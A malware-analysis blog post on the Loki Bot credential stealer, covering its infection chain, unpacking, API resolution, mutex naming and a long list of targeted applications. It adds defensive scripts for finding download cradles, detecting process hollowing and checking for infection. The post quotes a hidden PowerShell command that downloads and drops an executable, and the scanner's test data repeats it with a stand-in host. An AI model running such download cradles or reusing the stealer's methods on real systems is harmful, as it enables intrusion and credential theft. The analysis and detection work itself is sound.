For that reason, I started analyzing the samples to get to the bottom of the matter. For your peace of mind, I must say that the samples are not related to the “NotPetya” ransomware; they belong to an interesting malware family, dubbed “Loki Bot”, which I am going to explain.
Attack vector.
Loki Bot is a sensitive-information stealer. It can read private data from a long list of Windows programs and sends it to its CnC. The malware is sold on the internet with different modules and features.
As some malware researchers have already noted, the attack vector starts with a .doc file. This file exploits a known vulnerability (CVE-2017-0199) to download another file from a server (84.200.16.242/myguy.xls).
The downloaded .xls file has an embedded macro that downloads a binary from another server using PowerShell.
We can find the script by opening the .xls file with a hex editor.
After extracting the script and executing it, it tries to download a .exe file from the french-cooking[.]com domain.
PowerShell command:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking[.]com/myguy.exe', 'C:\Users\d00rt\AppData\Roaming\45298.exe');
Finally, when myguy.exe is executed, it tries to connect to its CnC, coffeinoffice[.]xyz.
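Since the cradle sits in the .xls as a plain string, a small scanner can pull the download URL and drop path out of the file instead of scrolling through a hex editor. The script below is an added example, not part of the original post or of the malware: it searches a byte blob for the WebClient.DownloadFile(...) pattern both as ASCII and as UTF-16LE (Office stores many strings wide, at either byte alignment) and defangs the URL. The SAMPLE_XLS bytes are constructed here: they embed a copy of the command from this post plus a made-up second cradle (evil.example) to exercise the UTF-16LE path; they are not bytes from myguy.xls.

```python
import re

# Constructed stand-in for a chunk of a macro-carrying .xls as seen in a hex
# editor: the ASCII cradle quoted in this post, plus a made-up UTF-16LE cradle
# (evil.example) so the wide-string path is exercised. Not bytes from myguy.xls.
SAMPLE_XLS = (
    b"\x00" * 16
    + b"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden "
    + b"(New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', "
    + b"'C:\\Users\\d00rt\\AppData\\Roaming\\45298.exe');"
    + b"\x00" * 16
    + ("powershell -w hidden (New-Object System.Net.WebClient)"
       ".DownloadFile('http://evil.example/a.exe', 'C:\\t.exe')").encode("utf-16-le")
)

# DownloadFile('<url>', '<local path>') with either quote style on each argument
CRADLE = re.compile(
    r"DownloadFile\(\s*(['\"])(?P<url>[^'\"]+)\1\s*,\s*(['\"])(?P<dest>[^'\"]+)\3\s*\)",
    re.IGNORECASE,
)


def defang(url: str) -> str:
    """hxxp://host[.]tld/path form, so the IOC cannot be clicked by accident."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + slash + path


def find_cradles(data: bytes) -> list:
    """Return every DownloadFile cradle in data, scanning it as ASCII and as
    UTF-16LE at both byte alignments (a wide string may start at an odd offset)."""
    views = [("ascii", data.decode("latin-1"))]
    for off in (0, 1):
        views.append(("utf-16le", data[off:].decode("utf-16-le", errors="ignore")))
    hits = []
    for encoding, text in views:
        for m in CRADLE.finditer(text):
            hit = {"encoding": encoding, "url": m.group("url"),
                   "dest": m.group("dest"), "defanged": defang(m.group("url"))}
            if hit not in hits:  # the same wide string is only found at one alignment
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in find_cradles(SAMPLE_XLS):
        print(f"[{hit['encoding']}] {hit['defanged']} -> {hit['dest']}")
```

Point it at the whole .xls (or at the decompressed VBA stream if the string is not visible in the raw file) and feed the defanged output straight into your IOC list; the drop path under AppData\Roaming is as useful a hunting artifact as the domain.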
Let's see what happens with myguy.exe ;)
Loki Bot Analysis.
Analyzed sample
MD5 | A1D5895F85751DFE67D19CCCB51B051A
SHA1 | 9288FB8E96D419586FC8C595DD95353D48E8A060
UNPACKING
This sample is protected with a custom packer, but in the end it uses the RunPE technique (process hollowing) to unpack itself; at that moment we can dump the unpacked payload and start a comfortable analysis.
Unpacked sample
MD5 | 49F3606755B12230BFF639361C7109A7
SHA1 | 234A7174E67EEC394FAF5139BC79C69BF0EBFFB8
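RunPE leaves a recognisable API footprint: a child created with CREATE_SUSPENDED, its memory written by the parent, the thread context re-pointed, and only then ResumeThread. The snippet below is an added example (not code from this post or from the malware) that flags that sequence in an API-call trace of the kind a sandbox or API monitor emits. The TRACE list is constructed for illustration, with placeholder paths and pids; it is not a trace of myguy.exe.

```python
CREATE_SUSPENDED = 0x00000004

# Constructed API trace in the shape a sandbox or API monitor emits:
# (caller pid, api, args). Placeholder pids and paths, not a trace of myguy.exe.
TRACE = [
    (1000, "CreateProcessW", {"app": r"C:\Users\victim\AppData\Roaming\45298.exe",
                              "flags": CREATE_SUSPENDED, "child_pid": 1200}),
    (1000, "NtUnmapViewOfSection", {"pid": 1200}),
    (1000, "VirtualAllocEx", {"pid": 1200, "size": 0x26000, "protect": 0x40}),
    (1000, "WriteProcessMemory", {"pid": 1200, "size": 0x400}),    # PE headers
    (1000, "WriteProcessMemory", {"pid": 1200, "size": 0x25000}),  # sections
    (1000, "SetThreadContext", {"pid": 1200}),
    (1000, "ResumeThread", {"pid": 1200}),
    (1000, "CreateProcessW", {"app": r"C:\Windows\System32\notepad.exe",
                              "flags": 0, "child_pid": 1300}),
    (1000, "WriteProcessMemory", {"pid": 1300, "size": 0x10}),     # never suspended: ignored
]

# The stages that must all occur, in this order, against a suspended child.
HOLLOW_ORDER = ("WriteProcessMemory", "SetThreadContext", "ResumeThread")


def find_runpe(trace):
    """Return one record per child that was created suspended and then written to,
    re-pointed with SetThreadContext and resumed by the same parent."""
    suspended = {}  # child pid -> record
    for pid, api, args in trace:
        if api in ("CreateProcessA", "CreateProcessW") and args.get("flags", 0) & CREATE_SUSPENDED:
            suspended[args["child_pid"]] = {"parent": pid, "image": args["app"],
                                            "seen": [], "bytes_written": 0}
            continue
        rec = suspended.get(args.get("pid"))
        if rec is None or pid != rec["parent"]:
            continue
        rec["seen"].append(api)
        if api == "WriteProcessMemory":
            rec["bytes_written"] += args.get("size", 0)

    hits = []
    for child_pid, rec in suspended.items():
        first = [rec["seen"].index(a) for a in HOLLOW_ORDER if a in rec["seen"]]
        # every stage present, and first occurrences in hollowing order
        if len(first) == len(HOLLOW_ORDER) and first == sorted(first):
            hits.append({"child_pid": child_pid, **rec})
    return hits


if __name__ == "__main__":
    for hit in find_runpe(TRACE):
        print(f"RunPE: pid {hit['parent']} hollowed pid {hit['child_pid']} "
              f"({hit['image']}), {hit['bytes_written']:#x} bytes written")
```

The same sequence tells you where to dump when doing it by hand: break on SetThreadContext or ResumeThread in the packer and the unpacked PE is already complete in the child (or in the parent's buffer passed to WriteProcessMemory), which is the point at which the hashes above were taken.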
WINDOWS API
This sample is not easy to analyze; it uses several techniques to make analysis harder. For example, to call any Windows API function it goes through a special resolver function: the malware pushes three values, and the function returns the memory address of the API it is looking for.
Main functionality
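When every API call goes through such a resolver, the constants pushed to it are the only clue to which function is being called, so the usual analyst move is to precompute them for the exports of the DLLs the sample touches. The script below is an added example, not code from this post or from Loki Bot: the post does not say what the three values are or how the lookup works, so a ROR-13 style hash (and a CRC32 variant) is used here purely as a placeholder; swap in the sample's real algorithm once you have reversed the resolver. EXPORTS is a constructed subset of kernel32 export names standing in for the export directory you would walk with a PE parser.

```python
import zlib

# Constructed subset of kernel32 export names; a real run would walk the export
# directory of each DLL with a PE parser.
EXPORTS = [
    "CreateProcessW", "VirtualAlloc", "VirtualAllocEx", "WriteProcessMemory",
    "SetThreadContext", "ResumeThread", "CreateMutexW", "LoadLibraryA",
    "GetProcAddress", "ExitProcess",
]


def ror13_hash(name: str) -> int:
    """ROR-13 style hash over the ASCII name plus its NUL terminator. Placeholder:
    the post does not document which hash (if any) Loki Bot's resolver uses."""
    h = 0
    for byte in name.encode("ascii") + b"\x00":
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + byte) & 0xFFFFFFFF
    return h


def crc32_hash(name: str) -> int:
    """CRC32 of the ASCII name, another common choice for export hashing."""
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF


def build_hash_table(names, hash_fn):
    """hash -> export name; refuses a table in which two exports collide."""
    table = {}
    for name in names:
        h = hash_fn(name)
        if h in table and table[h] != name:
            raise ValueError(f"collision: {table[h]} / {name} -> {h:#010x}")
        table[h] = name
    return table


def annotate(table, constants):
    """Map constants pushed to the resolver back to export names (None = unknown)."""
    return [table.get(c & 0xFFFFFFFF) for c in constants]


if __name__ == "__main__":
    table = build_hash_table(EXPORTS, ror13_hash)
    # constants as they would be read off the push instructions before the call
    pushed = [ror13_hash("CreateProcessW"), ror13_hash("ResumeThread"), 0x12345678]
    for const, name in zip(pushed, annotate(table, pushed)):
        print(f"{const:#010x} -> {name}")
```

Once the table is right, a script in your disassembler can rename each resolver call site after the function it resolves, which turns the "special function" back into readable imports for the rest of the analysis.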
Loki Bot initializes Winsock with WSAStartup, then creates a mutex whose name is derived from the MD5 of the machine GUID (the first 24 hex characters of the digest):
import hashlib
# machine_GUID: the value of HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid, as bytes
mutex_name = hashlib.md5(machine_GUID).hexdigest()[:24]
Later, Loki Bot collects sensitive information through the supported modules and sends it to the CnC.
After stealing the data, it establishes persistence on the system and finally waits for CnC commands in a loop.
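Because the mutex name is a pure function of a value every Windows host already has, you can compute the expected name for a machine and check whether something has already created it, which makes a cheap infection check. The script below is an added example, not code from this post or from the malware. It assumes the GUID is hashed as plain ASCII (the post does not state the encoding) and uses OpenMutexW through ctypes to probe the session-local object namespace; read_machine_guid and mutex_exists only work on Windows, while lokibot_mutex_name runs anywhere.

```python
import ctypes
import hashlib
import sys


def lokibot_mutex_name(machine_guid: str) -> str:
    """First 24 hex characters of MD5(MachineGuid), as described above.
    Assumption: the GUID string is hashed as plain ASCII."""
    return hashlib.md5(machine_guid.encode("ascii")).hexdigest()[:24]


def read_machine_guid() -> str:
    """Read HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid (Windows only)."""
    import winreg  # stdlib, Windows only
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Cryptography") as key:
        return winreg.QueryValueEx(key, "MachineGuid")[0]


def mutex_exists(name: str) -> bool:
    """Probe the session-local namespace with OpenMutexW (Windows only).
    ERROR_ACCESS_DENIED means the object exists but belongs to another security context."""
    SYNCHRONIZE = 0x00100000
    ERROR_ACCESS_DENIED = 5
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.OpenMutexW.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_wchar_p]
    kernel32.OpenMutexW.restype = ctypes.c_void_p
    kernel32.CloseHandle.argtypes = [ctypes.c_void_p]
    handle = kernel32.OpenMutexW(SYNCHRONIZE, False, name)
    if handle:
        kernel32.CloseHandle(handle)
        return True
    return ctypes.get_last_error() == ERROR_ACCESS_DENIED


if __name__ == "__main__":
    # pass a GUID on the command line to compute the name for another machine
    guid = sys.argv[1] if len(sys.argv) > 1 else read_machine_guid()
    name = lokibot_mutex_name(guid)
    print("expected Loki Bot mutex name:", name)
    if sys.platform == "win32":
        print("present on this host:", mutex_exists(name))
```

Two caveats when using this: kernel object names are case-sensitive, so the lowercase hexdigest() form matters if the sample uppercases it; and a mutex created without a Global\ prefix lives in the creating session's namespace, so run the check in the same user session you expect the infection in.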
SENSITIVE DATA
Loki Bot supports a lot of different Windows applications to steal information from. In the following table you can find all the modules that I could identify during the analysis.
Firefox | SoftwareNet | mSecure | Bitvise | 1Password
IceDragon | FTPShell | vnc_files | WinFTP | Winbox
Safari | NppFTP | BlazeFTP | MartinPrikryl | KDBX_files
K_Meleon | MyFTP | FAStream_NetFile | FreshFTP | Enpass
SeaMonkey | FTPBox | GoFTP | BitKinex | z_Mailing
Flock | SherrodFTP | ESTSoft_FTP | UltraFXP | Opera_Mail
Black_Hawk | FTPNow | DeluxeFTP | FTPNow2 | PostBox
Lunascape | Nexus | TotalComander | VanDyke | FossaMail
Comodo | XFTP | FTPGetter | OdinFTP | MailBox
Opera | EasyFTP | WS_FTP | NCH_FLING | WinChips
QtWeb | SFTP_NetDrive | FullTiltPoker | NCH_CLASSIC | Outlook
QupZilla | AbleFTP | PokerStars | Kitty | YMail2
Vault | JaSFTP | ExpandDrive | ThunderBird | TrulyMail
Cyberfox | Automize | Steed | FoxMail | spn_files
Pale_Moon | Cyberduck | FlashFXP | PocoMail | TODODesktop
WaterFox | FullSync | NovaFTP | IncrediMail | Stickies
GoogleTark | FTPInfo | NetDrive | GmailNotifierPro | NoteFly
SuperPutty | LinasFTP | TotalComander | dcf_files | Notezilla
Syncovery | FileZilla | SmartFTP | 32BitFTP | StickyNotes
FTPNavigato | StaffFTP | FarManager | RoboForm
Loki Bot loads an array with the addresses of these module routines and calls them dynamically.
During my analysis, the malware grabbed my Gmail account data from the Comodo Dragon browser and from the FileZilla config. (Look at the stolen data: you can see the passwords in plain text :O )
Once Loki Bot has finished stealing data, it prepares a packet to send to the CnC. The stolen data is compressed before it is sent: in this run the data went from 0x2541 bytes to 0xB27 bytes after compression.
The malware also collects metadata about the computer so that the stolen data can be tied to the machine it was taken from. This metadata forms the header of the packet sent to the CnC, together with some fields (total data size, stolen data size per module, ...) that I am not going to explain in depth in this post.
In the next image we see the final payload to be sent to the CnC, and the CnC domain: